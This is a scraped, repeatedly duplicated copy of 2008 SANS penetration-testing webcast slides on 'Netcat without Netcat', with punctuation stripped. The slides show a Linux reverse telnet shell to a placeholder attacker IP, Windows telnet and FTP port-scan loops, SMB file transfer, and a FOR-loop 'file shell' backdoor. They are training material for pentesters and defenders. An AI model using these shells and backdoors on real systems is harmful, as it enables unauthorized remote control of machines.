8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21
Command-Line Port Scanner
In Action
5 Not Closed
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22
Linux Command-Line
Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote
shell without using devtcpbull Linux telnet clients let us redirect Standard In and
Standard Out
bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |
binbash | telnet [attacker_IPaddr][port2]
bull Provide commands on attackerrsquos machine via port1
bull Receive output on attackerrsquos machine on port2
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23
Reverse Telnet Shell in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 21
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21
Command-Line Port Scanner
In Action
5 Not Closed
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22
Linux Command-Line
Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote
shell without using devtcpbull Linux telnet clients let us redirect Standard In and
Standard Out
bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |
binbash | telnet [attacker_IPaddr][port2]
bull Provide commands on attackerrsquos machine via port1
bull Receive output on attackerrsquos machine on port2
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23
Reverse Telnet Shell in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 22
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22
Linux Command-Line
Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote
shell without using devtcpbull Linux telnet clients let us redirect Standard In and
Standard Out
bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |
binbash | telnet [attacker_IPaddr][port2]
bull Provide commands on attackerrsquos machine via port1
bull Receive output on attackerrsquos machine on port2
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23
Reverse Telnet Shell in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 23
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23
Reverse Telnet Shell in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
